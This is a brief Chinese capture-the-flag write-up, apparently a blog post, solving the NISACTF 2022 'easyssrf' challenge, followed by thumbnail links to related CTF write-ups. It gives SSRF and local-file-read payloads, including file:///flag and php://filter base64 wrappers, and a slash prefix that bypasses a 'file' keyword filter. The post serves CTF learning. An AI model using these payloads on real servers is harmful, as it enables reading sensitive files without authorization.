它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统
它提醒我们输file:///fl4g
它提醒我们输ha1x1ux1u.php
看到代码stristr($file, “file”)当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过
file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码
file=php://filter/resource=/flag
file=/flag
[NISACTF 2022]easyssrf
2024-02-08 06:16:04 31 阅读
![php伪协议 [<span style='color:red;'>NISACTF</span> <span style='color:red;'>2022</span>]<span style='color:red;'>easyssrf</span>](https://img-blog.csdnimg.cn/direct/bab8938578604aa9a5e6a2190b0d2976.png)
![[<span style='color:red;'>NISACTF</span> <span style='color:red;'>2022</span>]checkin](https://img-blog.csdnimg.cn/direct/a7f95b46f6c44e71827fc950363fb9f0.png#pic_center)
![[<span style='color:red;'>NISACTF</span> <span style='color:red;'>2022</span>]babyupload](https://img-blog.csdnimg.cn/direct/76db6d84823c465a851f7a8cdc8bceaa.png)
![[<span style='color:red;'>NISACTF</span> <span style='color:red;'>2022</span>]bingdundun~](https://img-blog.csdnimg.cn/direct/45bc196477274d4186347e5eabbb23d1.png#pic_center)
![[<span style='color:red;'>NISACTF</span> <span style='color:red;'>2022</span>]babyupload](https://img-blog.csdnimg.cn/direct/ece3cf84121c4223a5475417c6740fac.png)
![关于ctf反序列化题的一些见解([MRCTF<span style='color:red;'>2020</span>]Ezpop以及[<span style='color:red;'>NISACTF</span> <span style='color:red;'>2022</span>]babyserialize)](https://img-blog.csdnimg.cn/direct/15a60bd5ee1545f5917e2ad1e2e7cb29.png)
![php反序列化——pop链构造[SWPUCTF <span style='color:red;'>2021</span> 新生赛]pop [<span style='color:red;'>NISACTF</span> <span style='color:red;'>2022</span>]babyserialize](https://img-blog.csdnimg.cn/direct/2867010e00fe41188d16fb0c632ccd02.png)
![Pikachu上的CSRF以及NSSCTF上的[<span style='color:red;'>NISACTF</span> <span style='color:red;'>2022</span>]bingdundun~、 [SWPUCTF <span style='color:red;'>2022</span> 新生赛]xff](https://img-blog.csdnimg.cn/direct/bdc03eff6490490db5577bbbd1bffea2.png)
